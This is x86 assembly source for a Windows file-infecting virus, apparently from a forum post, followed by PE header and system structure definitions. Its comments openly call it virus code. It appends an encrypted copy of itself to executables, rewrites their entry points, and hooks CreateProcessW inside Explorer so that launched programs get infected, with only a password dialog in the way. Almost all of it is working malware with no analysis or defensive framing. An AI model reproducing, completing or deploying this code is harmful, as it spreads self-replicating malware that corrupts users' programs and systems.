CALL ddGetFileAttributesA[EBX]
INC EAX
JZ _InfectExit
DEC EAX
MOV DWORD PTR [EBP - 4],EAX

;更改文件属性
PUSH FILE_ATTRIBUTE_ARCHIVE
PUSH DWORD PTR [EBP + 8]
CALL ddSetFileAttributesA[EBX]
TEST EAX,EAX
JZ _InfectExit

;打开文件
PUSH NULL
PUSH 0
PUSH OPEN_EXISTING
PUSH NULL
PUSH 0
PUSH GENERIC_READ OR GENERIC_WRITE
PUSH DWORD PTR [EBP + 8]
CALL ddCreateFileA[EBX]
INC EAX
JZ _ErrorSetAttributs
DEC EAX
MOV DWORD PTR [EBP - 8],EAX

;取得文件大小
PUSH NULL
PUSH EAX
CALL ddGetFileSize[EBX]
INC EAX
JZ _ErrorCloseFile
DEC EAX
MOV DWORD PTR [EBP - 20],EAX

;创建内存映射文件
PUSH NULL
PUSH 0
PUSH 0
PUSH PAGE_READWRITE
PUSH NULL
PUSH DWORD PTR [EBP - 8]
CALL ddCreateFileMappingA[EBX]
TEST EAX,EAX
JZ _ErrorCloseFile
MOV DWORD PTR [EBP - 12],EAX

;映射内存映射文件
PUSH 0
PUSH 0
PUSH 0
PUSH FILE_MAP_ALL_ACCESS
PUSH EAX
CALL ddMapViewOfFile_Host[EBX]
TEST EAX,EAX
JZ _ErrorCloseFileMap
MOV DWORD PTR [EBP - 16],EAX

;定位到NT头
MOV ESI,EAX
CALL _GetNtHeader
TEST EAX,EAX
JE _ErrorCloseViewOfMap

PUSH DWORD PTR [EBP - 16]
PUSH EAX
CALL _IsNotInfect
TEST EAX,EAX
JNE _ErrorCloseViewOfMap

;文件原大小对齐到 fileAlignment
PUSH [ESI].INH_OptionalHeader.IOH_FileAlignment
PUSH DWORD PTR [EBP - 20]
CALL _Align2Number
MOV DWORD PTR [EBP - 20],EAX

;病毒代码大小对齐 fileAlignment
PUSH [ESI].INH_OptionalHeader.IOH_FileAlignment
PUSH SIZE_OF_CODE
CALL _Align2Number
MOV DWORD PTR [EBP - 24],EAX

;定位到最后一个节表
;并把节表复制到栈里[EBP - 36 - SIZE IMAGE_SECTION_HEADER]
PUSH SIZE IMAGE_SECTION_HEADER
POP ECX
MOV EDI,EBP
SUB EDI,36
SUB EDI,ECX
MOVZX EAX,[ESI].INH_FileHeader.IFH_NumberOfSections
DEC EAX
MUL ECX
PUSH ESI
ADD ESI,SIZE IMAGE_NT_HEADERS
ADD ESI,EAX
PUSH EDI
REP MOVSB
POP EDI
POP ESI
MOV DWORD PTR [EBP - 36],EDI

;计算最后一个节的原始大小
;原始大小 = 文件大小 - 节开始地址
MOV EAX,DWORD PTR [EBP - 20]
SUB EAX,[EDI].ISH_PointerToRawData

;原始大小对齐到fileAlignment
PUSH [ESI].INH_OptionalHeader.IOH_FileAlignment
PUSH EAX
CALL _Align2Number

;计算病毒代码入口地址
;因为病毒代码附加在最后一节的后面
;病毒入口地址 = 节开始虚拟地址 + 最后一节原始大小(对齐后)
;病毒入口地址保存进 [EBP - 28]
PUSH EAX
ADD EAX,[EDI].ISH_VirtualAddress
MOV DWORD PTR [EBP - 28],EAX
POP EAX

;计算感染后节大小
;感染后的节大小 = 节原始大小(对齐后) + 感染代码大小(对齐后)
ADD EAX,DWORD PTR [EBP - 24]
MOV [EDI].ISH_SizeOfRawData,EAX

;节感染后的大小对齐到 SectionAlignment
PUSH [ESI].INH_OptionalHeader.IOH_SectionAlignment
PUSH EAX
CALL _Align2Number
MOV [EDI].ISH_VirtualSize,EAX
;改变节属性 = 读写可执行
MOV [EDI].ISH_Characteristics,IMAGE_SCN_MEM_ALL

;计算 ImageSize = 最后一节的虚拟地址 + 最后一节的大小对齐到SectionAlignment
ADD EAX,[EDI].ISH_VirtualAddress
MOV DWORD PTR [EBP - 32],EAX

;解除内存映射
PUSH DWORD PTR [EBP - 16]
CALL ddUnmapViewOfFile[EBX]

;关闭内存映射文件句柄
PUSH DWORD PTR [EBP - 12]
CALL ddCloseHandle[EBX]

;计算感染后文件大小
MOV EAX,DWORD PTR [EBP - 20]
ADD EAX,DWORD PTR [EBP - 24]
;用感染后的文件大小重新生成内存映射文件
PUSH NULL
PUSH EAX
PUSH 0
PUSH PAGE_READWRITE
PUSH NULL
PUSH DWORD PTR [EBP - 8]
CALL ddCreateFileMappingA[EBX]
TEST EAX,EAX
JE _ErrorCloseFile
MOV DWORD PTR [EBP - 12],EAX

;映射到内存指针
PUSH 0
PUSH 0
PUSH 0
PUSH File_MAP_ALL_ACCESS
PUSH EAX
CALL ddMapViewOfFile_Host[EBX]
TEST EAX,EAX
JE _ErrorCloseFile
MOV DWORD PTR [EBP - 16],EAX

;取得IMAGE_NT_HEADERS
MOV ESI,DWORD PTR [EBP - 16]
CALL _GetNtHeader
TEST EAX,EAX
JE _ErrorCloseViewOfMap

;修正SizeOfImage
PUSH DWORD PTR [EBP - 32]
POP [ESI].INH_OptionalHeader.IOH_SizeOfImage

;计算程序入口地址在文件中的偏移
PUSH [ESI].INH_OptionalHeader.IOH_AddressOfEntryPoint
PUSH EAX
CALL _GetRawFromRVA
MOV DWORD PTR [EBP - 32],EAX

;将修正后的节复制到最后一节
PUSH SIZE IMAGE_SECTION_HEADER
POP ECX
MOV EDI,DWORD PTR [EBP - 36]
MOVZX EAX,[ESI].INH_FileHeader.IFH_NumberOfSections
DEC EAX
MUL ECX
PUSH ESI
ADD ESI,SIZE IMAGE_NT_HEADERS
ADD ESI,EAX
XCHG EDI,ESI
REP MOVSB
POP ESI

;计算病毒入口地址相对于原程序入口的偏移
MOV EAX,DWORD PTR [EBP - 28]
SUB EAX,[ESI].INH_OptionalHeader.IOH_AddressOfEntryPoint
SUB EAX,5
LEA EDI,@d[EBX]
INC EDI
STOSD

;保存原程序入口的代码
MOV ESI,DWORD PTR [EBP - 32]
ADD ESI,DWORD PTR [EBP - 16]
LEA EDI,@f[EBX]
PUSH SIZE_OF_EPC
POP ECX
PUSH ECX
PUSH ESI
REP MOVSB
POP ESI
POP ECX

;将新代码写入原程序入口
LEA EDI,@a[EBX]
XCHG EDI,ESI
REP MOVSB

;将病毒代码写入文件
PUSH 65535
PUSH 313
PUSH 421
CALL _RandNumber
MOV dbDecodeKey[EBX],AL
MOV selfFlag[EBX],AH

LEA ESI,_CodeHead[EBX]
MOV EDI,DWORD PTR [EBP - 16]
ADD EDI,DWORD PTR [EBP - 20]
PUSH SIZE_OF_CODE
POP ECX
PUSH EDI
REP MOVSB
POP EDI

PUSH EDI

ADD EDI,NEW_START_OFF
PUSH SIZE_OF_ENCODE
POP ECX
_SecondEncode:
XOR BYTE PTR [EDI],AL
INC EDI
LOOP _SecondEncode

POP EDI
ADD EDI,SELF_KEY_OFF
PUSH SIZE_OF_STR
POP ECX
_StringEncode:
XOR BYTE PTR [EDI],AH
INC EDI
LOOP _StringEncode

_ErrorCloseViewOfMap:
PUSH DWORD PTR [EBP - 16]
CALL ddUnmapViewOfFile[EBX]
_ErrorCloseFileMap:
PUSH DWORD PTR [EBP - 12]
CALL ddCloseHandle[EBX]
_ErrorCloseFile:
PUSH DWORD PTR [EBP - 8]
CALL ddCloseHandle[EBX]
_ErrorSetAttributs:
PUSH DWORD PTR [EBP - 4]
PUSH DWORD PTR [EBP + 8]
CALL ddSetFileAttributesA[EBX]
_InfectExit:
MOV ESP,EBP
POP EBP
RET 4
_InfectExeFile ENDP

;***********************************************************************
_EntryPointCode:
@a: CALL $+5
@b: POP EAX
@c: PUSH EAX
@d: ADD EAX,0FFFFH
@e: JMP EAX
Align 4
@f: DB SIZE_OF_EPC DUP(0)
;***********************************************************************

;///////////////////////////////////////////////////////////////////////
;以下为内存对话框所需数据
;///////////////////////////////////////////////////////////////////////
check_ok  DB '密码正确，允许运行!',0
check_false  DB '密码错误，是否继续执行？继续的话将感染文件！',0
password DB '123456abcdef',0
buffer DB 20 DUP (0)
ALIGN 4

_TemplateBegin:
MemoryDialog DLGTEMPLATE<090c00080H,0,3,0,0,160,96>
DW 0
DW 0
_TemplateEnd:
dialogCaption DB '请输入执行密码',0

bt_OK DLGITEMTEMPLATE<050000001H,0,30,60,35,20,IDC_BUTTON_OK>
DW 0FFFFH
DW 00080H
OkCaption DB '确认',0

bt_Cancle DLGITEMTEMPLATE<050000001H,0,95,60,35,20,IDC_BUTTON_CANCEL>
DW 0FFFFH
DW 00080H
CancelCaption DB '取消',0

edit DLGITEMTEMPLATE<0500100A0H,000204H,30,20,100,12,IDC_EDIT_PASSWORD>
DW 0FFFFH
DW 00081H
editCaption DD 0

ALIGN 4

;///////////////////////////////////////////////////////////////////////
;以下为生成内存对话框代码
;///////////////////////////////////////////////////////////////////////
DialogWithoutRes PROC
PUSH EBX
PUSH ECX
PUSH EDI

CALL _DWR_Delta
_DWR_Delta:
POP EBX
SUB EBX,OFFSET _DWR_Delta

LEA EDI,DialogTemplate[EBX]
PUSH 512
POP ECX
XOR EAX,EAX
REP STOSB

PUSH 1
PUSH OFFSET DialogTemplate
ADD DWORD PTR [ESP],EBX
PUSH OFFSET MemoryDialog
ADD DWORD PTR [ESP],EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return

PUSH 0
PUSH EAX
PUSH OFFSET bt_OK
ADD DWORD PTR [ESP],EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return

PUSH 0
PUSH EAX
PUSH OFFSET bt_Cancle
ADD DWORD PTR [ESP],EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return

PUSH 0
PUSH EAX
PUSH OFFSET edit
ADD DWORD PTR [ESP],EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return

PUSH 0
PUSH OFFSET DlgProc
ADD DWORD PTR [ESP],EBX
PUSH NULL
PUSH OFFSET DialogTemplate
ADD DWORD PTR [ESP],EBX
PUSH NULL
CALL ddDialogBoxIndirectParamA[EBX]
_DWR_Return:
POP EDI
POP ECX
POP EBX
RET
DialogWithoutRes ENDP

;**************************************************************************************
;InitializeTemplate stdcall,srcTemplate:DWORD,dstTemplate:DWORD,flagDialogOrItem:DWORD
;PUSH flagDialogOrItem [EBP + 16]
;PUSH dstTemplate [EBP + 12]
;PUSH srcTemplate [EBP + 8]
;PUSH return_address [EBP + 4]
;CALL InitializeTemplate
;PUSH EBP [EBP]
;**************************************************************************************
InitializeTemplate PROC
PUSH EBP
MOV EBP,ESP

PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI

CALL _IT_Delta
_IT_Delta:
POP EBX
SUB EBX,OFFSET _IT_Delta

MOV ESI,DWORD PTR [EBP + 8]
MOV EDI,DWORD PTR [EBP + 12]
MOV ECX,SIZE_OF_TEMPLATE

CLD
REP MOVSB

PUSH 032H
PUSH EDI
PUSH -1
PUSH ESI
PUSH 0
PUSH 0
CALL ddMultiByteToWideChar[EBX]

TEST EAX,EAX
JE _IT_return

PUSH EAX
XOR ECX,ECX
INC ECX
INC ECX
DIV CL
SHR EAX,8
XCHG EAX,ECX
XOR ECX,DWORD PTR [EBP + 16]
POP EAX

ADD EAX,ECX
SHL EAX,1
ADD EAX,EDI
ADD EAX,3
SHR EAX,2
SHL EAX,2

_IT_return:
POP EDI
POP ESI
POP ECX
POP EBX

MOV ESP,EBP
POP EBP
RET 12
InitializeTemplate ENDP

;CenterDialog PROC stdcall,HWND:DWORD
;PUSH HWND [EBP + 8]
;PUSH return_address [EBP + 4]
;CALL CenterDialog
;PUSH EBP [EBP]
;RECT of desktop window [EBP - 16] left,top,right,bottom
;RECT of this window [EBP - 32]
CenterDialog PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,32
PUSH EBX

CALL _CD_Delta
_CD_Delta:
POP EBX
SUB EBX,OFFSET _CD_Delta

PUSH EBP
SUB DWORD PTR [ESP],32
PUSH DWORD PTR [EBP + 8]
CALL ddGetWindowRect[EBX]

CALL ddGetDesktopWindow[EBX]

PUSH EBP
SUB DWORD PTR [ESP],16
PUSH EAX
CALL ddGetWindowRect[EBX]

PUSH 1
PUSH DWORD PTR [EBP - 32 + 12]
PUSH DWORD PTR [EBP - 32 + 8]

MOV EAX,DWORD PTR [EBP - 16 + 12]
SUB EAX,DWORD PTR [EBP - 32 + 12]
SHR EAX,1
PUSH EAX

MOV EAX,DWORD PTR [EBP - 16 + 8]
SUB EAX,DWORD PTR [EBP - 32 + 8]
SHR EAX,1
PUSH EAX

PUSH DWORD PTR [EBP + 8]
CALL ddMoveWindow[EBX]

POP EBX
ADD ESP,36
MOV ESP,EBP
POP EBP
RET
CenterDialog ENDP

;DlgProc STDCALL,hwnd_:DWORD,wmsg:DWORD,wparam_:DWORD,lparam_:DWORD
;PUSH lparam_ [EBP + 20]
;PUSH wparam_ [EBP + 16]
;PUSH msg_ [EBP + 12]
;PUSH hwnd_ [EBP + 8]
;PUSH return_address [EBP + 4]
;CALL dlgProc
;PUSH EBP [EBP]
DlgProc PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,4
PUSH 0
POP DWORD PTR [EBP - 4]
PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI
CALL _DP_Delta
_DP_Delta:
POP EBX
SUB EBX,OFFSET _DP_Delta

CMP DWORD PTR [EBP + 12], WM_DESTROY
JE msg_DESTORY

CMP DWORD PTR [EBP + 12], WM_CLOSE
JE msg_DESTORY

CMP DWORD PTR [EBP + 12], WM_COMMAND
JE msg_COMMAND

CMP DWORD PTR [EBP + 12], WM_INITDIALOG
JE msg_INITDIALOG

XOR EAX,EAX
JMP _DP_Return

msg_INITDIALOG:
PUSH DWORD PTR [EBP + 8]
CALL CenterDialog
JMP _DP_Return

msg_DESTORY:
PUSH DWORD PTR [EBP - 4]
PUSH DWORD PTR [EBP + 8]
CALL ddEndDialog[EBX]
JMP _DP_Return

msg_COMMAND:
CMP WORD PTR [EBP + 16],IDC_BUTTON_OK
JE Check_PWD

CMP WORD PTR [EBP + 16], IDC_BUTTON_CANCEL
JE msg_DESTORY

JMP _DP_Return

Check_PWD:
PUSH 19
PUSH OFFSET buffer
ADD DWORD PTR [ESP],EBX
PUSH IDC_EDIT_PASSWORD
PUSH DWORD PTR [EBP + 8]
CALL ddGetDlgItemTextA[EBX]
CMP EAX,12

JNE Input_Error
PUSH EAX
POP ECX
MOV ESI,OFFSET buffer
ADD ESI,EBX
MOV EDI,OFFSET password
ADD EDI,EBX

CLD
REPE CMPSB
JCXZ Input_OK
JMP Input_Error

Input_OK:
PUSH MB_OK
PUSH NULL
PUSH OFFSET check_ok
ADD DWORD PTR [ESP],EBX
PUSH DWORD PTR [EBP + 8]
CALL ddMessageBoxA[EBX]
PUSH 1
POP DWORD PTR [EBP - 4]
JMP msg_Destory

Input_Error:
PUSH MB_YESNO
PUSH NULL
PUSH OFFSET check_false
ADD DWORD PTR [ESP],EBX
PUSH DWORD PTR [EBP + 8]
CALL ddMessageBoxA[EBX]
CMP EAX,6
JNE _DP_Return
PUSH 2
POP DWORD PTR [EBP - 4]
JMP msg_Destory

_DP_Return:
POP EDI
POP ESI
POP ECX
POP EBX
ADD ESP,4
MOV ESP,EBP
POP EBP
RET 16
DlgProc ENDP

_CreateProcessW_Hook PROC
PUSH EBP
MOV EBP,ESP

SUB ESP,01000H

PUSH EBX
PUSH ECX
PUSH EDX
PUSH ESI
PUSH EDI

CALL _CPWDelta
_CPWDelta:
POP EBX
SUB EBX,OFFSET _CPWDelta

MOV EAX,DWORD PTR [EBP + 8]
TEST EAX,EAX

JNZ _GetParamI
_GetParamII:
MOV EAX,DWORD PTR [EBP + 12]
TEST EAX,EAX
JZ _CPWExit
_GetParamI:
MOV ESI,EAX
MOV EDI,EBP
SUB EDI,MAX_PATH

;将Unicode字符转化为 ASCII 字符
PUSH NULL
PUSH NULL
PUSH MAX_PATH
PUSH EDI
PUSH -1
PUSH ESI
PUSH 0
PUSH 0
CALL ddWideCharToMultiByte[EBX]
TEST EAX,EAX
JE _CPWExit

PUSH EDI
SUB EDI,MAX_PATH
PUSH EDI
CALL _GetExeFileName

CALL DialogWithOutRes
XCHG EAX,ECX

JCXZ _CPWExit

DEC ECX
JCXZ _ProcessNormal

PUSH EDI
CALL _InfectExeFile

_ProcessNormal:
CALL _CPW_OldCodeStore
PUSH DWORD PTR [EBP + 44]
PUSH DWORD PTR [EBP + 40]
PUSH DWORD PTR [EBP + 36]
PUSH DWORD PTR [EBP + 32]
PUSH DWORD PTR [EBP + 28]
PUSH DWORD PTR [EBP + 24]
PUSH DWORD PTR [EBP + 20]
PUSH DWORD PTR [EBP + 16]
PUSH DWORD PTR [EBP + 12]
PUSH DWORD PTR [EBP + 8]
CALL ddCreateProcessW[EBX]

_CPWExit:
CALL _CPW_NewCodeStore
POP EDI
POP ESI
POP EDX
POP ECX
POP EBX

MOV ESP,EBP
POP EBP
RET 40
_CreateProcessW_Hook ENDP
;***********************************************************************

_PeekMessageW_Hook:
PUSH EBP
MOV EBP,ESP
SUB ESP,4

PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI

CALL _PeekMessageWDelta
_PeekMessageWDelta:
POP EBX
SUB EBX,OFFSET _PeekMessageWDelta

;查看内存映射文件是否已经打开
;若已打开则直接跳出
PUSH ddMapFileHandle_Host[EBX]
POP EAX
TEST EAX,EAX
JNE _IsNotFirstIn

;打开内存映射文件
_PushAddress szMapFileName_Host
PUSH 0
PUSH FILE_MAP_WRITE
CALL ddOpenFileMappingA_Host[EBX]

;打开失败则退出
TEST EAX,EAX
JE _IsNotFirstIn

MOV ddMapFileHandle_Host[EBX],EAX

;映射地址空间
PUSH 0
PUSH 0
PUSH 0
PUSH FILE_MAP_ALL_ACCESS
PUSH EAX
CALL ddMapViewOfFile_Host[EBX]

TEST EAX,EAX
JE _IsNotFirstIn

MOV ddViewOfMap_Host[EBX],EAX
MOV EDI,EAX

;将CreateProcessW的挂接函数地址写入挂接代码
;写入内存映射文件中
ADD EAX,CPW_HOOK_OFF
ADD EDI,CPW_CODE_OFF
INC EDI
STOSD

;写入PeekMessage Hook中
LEA EDI,CPW_NewCode[EBX]
INC EDI
STOSD

;更改CreateProcessW所在页面的保护属性
MOV EAX,ddCreateProcessW_Host[EBX]
AND EAX,0FFFFF000H
PUSH EBP
SUB DWORD PTR [ESP],4
PUSH PAGE_EXECUTE_READWRITE
PUSH 02000H
PUSH EAX
CALL ddVirtualProtect_Host[EBX]
TEST EAX,EAX
JE _IsNotFirstIn

;打开 event 对象
_PushAddress szEventName
PUSH 0
PUSH EVENT_MODIFY_STATE
CALL ddOpenEventA_Host[EBX]
TEST EAX,EAX
JE _IsNotFirstIn

PUSH EAX
;将挂接代码写入CreateProcessW
CALL _CPW_NewCodeStore
;将Event对象设置为有信号
CALL ddSetEvent_Host[EBX]
_IsNotFirstIn:
MOV EAX,EBX
POP EDI
POP ESI
POP ECX
POP EBX
MOV ESP,EBP
POP EBP

PUSH DWORD PTR ddPeekMessageW_Host[EAX]
POP EAX
JMP EAX

_CPW_NewCodeStore PROC
PUSH 7
POP ECX
MOV EDI,ddCreateProcessW_Host[EBX]
LEA ESI,CPW_NewCode[EBX]
REP MOVSB
RET
_CPW_NewCodeStore ENDP

szMapFileName_Host DB "LongliveChairmanMao",0
szEventName DB "TheThoughtOfChiremanMaoAlwaysShines",0
ALIGN 4
ddMapFileHandle_Host DD 0
ddViewOfMap_Host DD 0
ddMapViewOfFile_Host DD 0
ddCreateProcessW_Host DD 0
ddOpenFileMappingA_Host DD 0
ddVirtualProtect_Host DD 0
ddOpenEventA_Host DD 0
ddSetEvent_Host DD 0
ddMessageBoxA_Host DD 0
ddPeekMessageW_Host DD 0
CPW_OldCode DB 8 DUP(0)
CPW_NewCode DB 0B8H,0,0,0,0,0FFH,0E0H,0
_PeekMessageW_HookTail:

szTestFile DB "E:\Notepad.exe",0
szLoadLibraryA DB "LoadLibraryA",0
szCreateToolhelp32Snapshot DB "CreateToolhelp32Snapshot",0
szProcess32First DB "Process32First",0
szProcess32Next DB "Process32Next",0
szModule32First DB "Module32First",0
szModule32Next DB "Module32Next",0
szOpenProcess DB "OpenProcess",0
szUnmapViewOfFile DB "UnmapViewOfFile",0
szCloseHandle DB "CloseHandle",0
szGetFileAttributesA DB "GetFileAttributesA",0
szSetFileAttributesA DB "SetFileAttributesA",0
szCreateFileA DB "CreateFileA",0
szGetFileSize DB "GetFileSize",0
szGetTickCount DB "GetTickCount",0
szWriteProcessMemory DB "WriteProcessMemory",0
szReadProcessMemory DB "ReadProcessMemory",0
szVirtualProtectEx DB "VirtualProtectEx",0
szWideCharToMultiByte DB "WideCharToMultiByte",0
szMultiByteToWideChar DB "MultiByteToWideChar",0
szCreateEventA DB "CreateEventA",0
szWaitForSigleObject DB "WaitForSingleObject",0
szCreateProcessW DB "CreateProcessW",0
szOpenFileMappingA DB "OpenFileMappingA",0
szVirtualProtect DB "VirtualProtect",0
szOpenEventA DB "OpenEventA",0
szSetEvent DB "SetEvent",0,0
szUser32 DB "USER32.DLL",0
szMessageBoxA DB "MessageBoxA",0
szPeekMessageW DB "PeekMessageW",0
szGetDesktopWindow DB "GetDesktopWindow",0
szDialogBoxIndirectParamA DB "DialogBoxIndirectParamA",0
szGetDlgItemTextA DB "GetDlgItemTextA",0
szGetWindowRect DB "GetWindowRect",0
szMoveWindow DB "MoveWindow",0
szEndDialog DB "EndDialog",0,0
szExplorer DB "EXPLORER.EXE",0
ALIGN 4
_CodeTail:
ddExplorerHandle DD ?
ddExplorerModule DD ?
ddCreateFileMappingA DD ?
ddGetProcAddress DD ?
ddLoadLibraryA DD ?
ddCreateToolhelp32Snapshot DD ?
ddProcess32First DD ?
ddProcess32Next DD ?
ddModule32First DD ?
ddModule32Next DD ?
ddOpenProcess DD ?
ddUnmapViewOfFile DD ?
ddCloseHandle DD ?
ddGetFileAttributesA DD ?
ddSetFileAttributesA DD ?
ddCreateFileA DD ?
ddGetFileSize DD ?
ddGetTickCount DD ?
ddWriteProcessMemory DD ?
ddReadProcessMemory DD ?
ddVirtualProtectEx DD ?
ddWideCharToMultiByte DD ?
ddMultiByteToWideChar DD ?
ddCreateEventA DD ?
ddWaitForSingleObject DD ?
ddCreateProcessW DD ?
ddOpenFileMappingA DD ?
ddVirtualProtect DD ?
ddOpenEventA DD ?
ddSetEvent DD ?
ddMessageBoxA DD ?
ddPeekMessageW DD ?
ddGetDesktopWindow DD ?
ddDialogBoxIndirectParamA DD ?
ddGetDlgItemTextA DD ?
ddGetWindowRect DD ?
ddMoveWindow DD ?
ddEndDialog DD ?

ALIGN 4

ddGlobalBuffer DD ?
ALIGN 4
DialogTemplate DD ?
END _Main

xieglt · 发表于 2016-11-19 23:29:39

CONTEXT STRUC
C_ContextFlags DD ?
C_Dr0 DD ?
C_Dr1 DD ?
C_Dr2 DD ?
C_Dr3 DD ?
C_Dr6 DD ?
C_Dr7 DD ?
C_Float DB 70H DUP(?)
C_SegGs DD ?
C_SegFs DD ?
C_SegEs DD ?
C_SegDs DD ?
C_Edi DD ?
C_Esi DD ?
C_Ebx DD ?
C_Edx DD ?
C_Ecx DD ?
C_Eax DD ?
C_Ebp DD ?
C_Eip DD ?
C_SegCs DD ?
C_EFlags DD ?
C_Esp DD ?
C_SegSs DD ?
CONTEXT ENDS

EXCEPTION_POINTERS STRUC
ExceptionRecord DD ?
ContextRecord DD ?
EXCEPTION_POINTERS ENDS

EXCEPTION_RECORD STRUC
ExceptionCode DD ?
ExceptionFlags DD ?
LPExceptionRecord DD ?
ExceptionAddress DD ?
NumberParameters DD ?
ExceptionInformation DD 0FH DUP(?)
EXCEPTION_RECORD ENDS

IMAGE_DOS_HEADER STRUC
IDH_magic DW ?
IDH_cblp DW ?
IDH_cp DW ?
IDH_crlc DW ?
IDH_cparhdr DW ?
IDH_minalloc DW ?
IDH_maxalloc DW ?
IDH_ss DW ?
IDH_sp DW ?
IDH_csum DW ?
IDH_ip DW ?
IDH_cs DW ?
IDH_lfarlc DW ?
IDH_ovno DW ?
IDH_res DW 4 DUP(?)
IDH_oemid DW ?
IDH_oeminfo DW ?
IDH_res2 DW 10 DUP(?)
IDH_lfanew DD ?
IMAGE_DOS_HEADER ENDS

DOS_SIGN = 05A4DH

IMAGE_DATA_DIRECTORY STRUC
IDD_VirtualAddress DD ?
IDD_Size DD ?
IMAGE_DATA_DIRECTORY ENDS

IMAGE_FILE_HEADER STRUC
IFH_Machine DW ?
IFH_NumberOfSections DW ?
IFH_TimeDateStamp DD ?
IFH_PointerToSymbolTable DD ?
IFH_NumberOfSymbols DD ?
IFH_SizeOfOptionalHeader DW ?
IFH_Characteristics DW ?
IMAGE_FILE_HEADER ENDS

IMAGE_OPTIONAL_HEADER STRUC
IOH_Magic DW ?
IOH_MajorLinkerVersion DB ?
IOH_MinorLinkerVersion DB ?
IOH_SizeOfCode DD ?
IOH_SizeOfInitializedData DD ?
IOH_SizeOfUninitializedData DD ?
IOH_AddressOfEntryPoint DD ?
IOH_BaseOfCode DD ?
IOH_BaseOfData DD ?
IOH_ImageBase DD ?
IOH_SectionAlignment DD ?
IOH_FileAlignment DD ?
IOH_MajorOperatingSystemVersion DW ?
IOH_MinorOperatingSystemVersion DW ?
IOH_MajorImageVersion DW ?
IOH_MinorImageVersion DW ?
IOH_MajorSubsystemVersion DW ?
IOH_MinorSubsystemVersion DW ?
IOH_Win32VersionValue DD ?
IOH_SizeOfImage DD ?
IOH_SizeOfHeaders DD ?
IOH_CheckSum DD ?
IOH_Subsystem DW ?
IOH_DllCharacteristics DW ?
IOH_SizeOfStackReserve DD ?
IOH_SizeOfStackCommit DD ?
IOH_SizeOfHeapReserve DD ?
IOH_SizeOfHeapCommit DD ?
IOH_LoaderFlags DD ?
IOH_NumberOfRvaAndSizes DD ?
IOH_DataDirectory IMAGE_DATA_DIRECTORY 10H DUP(?)
IMAGE_OPTIONAL_HEADER ENDS

IMAGE_NT_HEADERS STRUC
INH_Signature DD ?
INH_FileHeader IMAGE_FILE_HEADER ?
INH_OptionalHeader IMAGE_OPTIONAL_HEADER ?
IMAGE_NT_HEADERS ENDS

NT_SIGN = 04550H

IMAGE_SECTION_HEADER STRUC
ISH_Name DB 8 DUP (?)
ISH_VirtualSize DD ?
ISH_VirtualAddress DD ?
ISH_SizeOfRawData DD ?
ISH_PointerToRawData DD ?
ISH_PointerToRelocations DD ?
ISH_PointerToLinenumbers DD ?
ISH_NumberOfRelocations DW ?
ISH_NumberOfLinenumbers DW ?
ISH_Characteristics DD ?
IMAGE_SECTION_HEADER ENDS

IMAGE_IMPORT_DESCRIPTOR STRUC
IID_Characteristics DD ?
IID_TimeDateStamp DD ?
IID_ForwarderChain DD ?
IID_Name DD ?
IID_FirstThunk DD ?
IMAGE_IMPORT_DESCRIPTOR ENDS

IMAGE_THUNK_DATA32 STRUC
ITD_Function DD ?
IMAGE_THUNK_DATA32 ENDS

IMAGE_EXPORT_DIRECTORY STRUC
IED_Characteristics DD ?
IED_TimeDateStamp DD ?
IED_MajorVersion DW ?
IED_MinorVersion DW ?
IED_Name DD ?
IED_Base DD ?
IED_NumberOfFunctions DD ?
IED_NumberOfNames DD ?
IED_AddressOfFunctions DD ?
IED_AddressOfNames DD ?
IED_AddressOfNameOrdinals DD ?
IMAGE_EXPORT_DIRECTORY ENDS

FILE_TIME STRUC
FT_LowDateTime DD ?
FT_HighDateTime DD ?
FILE_TIME ENDS

MAX_MODULE_NAME32 = 256
MAX_PATH = 260

WIN32_FIND_DATA STRUC
WFD_FileAttributes DD ?
WFD_CreationTime FILE_TIME ?
WFD_LastAccessTime FILE_TIME ?
WFD_LastWriteTime FILE_TIME ?
WFD_FileSizeHigh DD ?
WFD_FileSizeLow DD ?
WFD_Reserved0 DD ?
WFD_Reserved1 DD ?
WFD_FileName DB MAX_PATH DUP(?)
WFD_AlternateFileName DB 14 DUP(?)
WIN32_FIND_DATA ENDS

PROCESS_ENTRY32 STRUC
PE_dwSize DD ?
PE_cntUsage DD ?
PE_th32ProcessID DD ?
PE_th32DefaultHeapID DD ?
PE_th32ModuleID DD ?
PE_cntThreads DD ?
PE_th32ParentProcessID DD ?
PE_pcPriClassBase DD ?
PE_dwFlags DD ?
PE_szExeFile DB MAX_PATH DUP(?)
PROCESS_ENTRY32 ENDS

MODULE_ENTRY32 STRUC
ME_dwSize DD ?
ME_th32ModuleID DD ?
ME_th32ProcessID DD ?
ME_GlblcntUsage DD ?
ME_ProccntUsage DD ?
ME_modBaseAddr DD ?
ME_modBaseSize DD ?
ME_hModule DD ?
ME_szModule DB MAX_MODULE_NAME32 DUP(?)
ME_szExePath DB MAX_PATH DUP(?)
MODULE_ENTRY32 ENDS

OS_VERSION_INFO STRUC
OVI_dwOSVersionInfoSize DD ?
OVI_dwMajorVersion DD ?
OVI_dwMinorVersion DD ?
OVI_dwBuildNumber DD ?
OVI_dwPlatformId DD ?
OVI_szCSDVersion DB 128 DUP(?)
OS_VERSION_INFO ENDS

DLGTEMPLATE STRUC
DT_style DD ?
DT_ExtendedStyle DD ?
DT_cdit DW ?
DT_x DW ?
DT_y DW ?
DT_cx DW ?
DT_cy DW ?
DLGTEMPLATE ENDS

DLGITEMTEMPLATE STRUC
DIT_style DD ?
DIT_ExtendedStyle DD ?
DIT_x DW ?
DIT_y DW ?
DIT_cx DW ?
DIT_cy DW ?
DIT_id DW ?
DLGITEMTEMPLATE ENDS

FILE_ATTRIBUTE_ARCHIVE = 20H
FILE_ATTRIBUTE_NORMAL = 80H
FILE_ATTRIBUTE_DIRECTORY = 10H

GENERIC_READ = 80000000H
GENERIC_WRITE = 40000000H
GENERIC_EXECUTE = 20000000H
GENERIC_ALL = 10000000H

CREATE_NEW = 1
CREATE_ALWAYS = 2
OPEN_EXISTING = 3
OPEN_ALWAYS = 4

INVALID_HANDLE_VALUE = 0FFFFFFFFH
NULL = 0

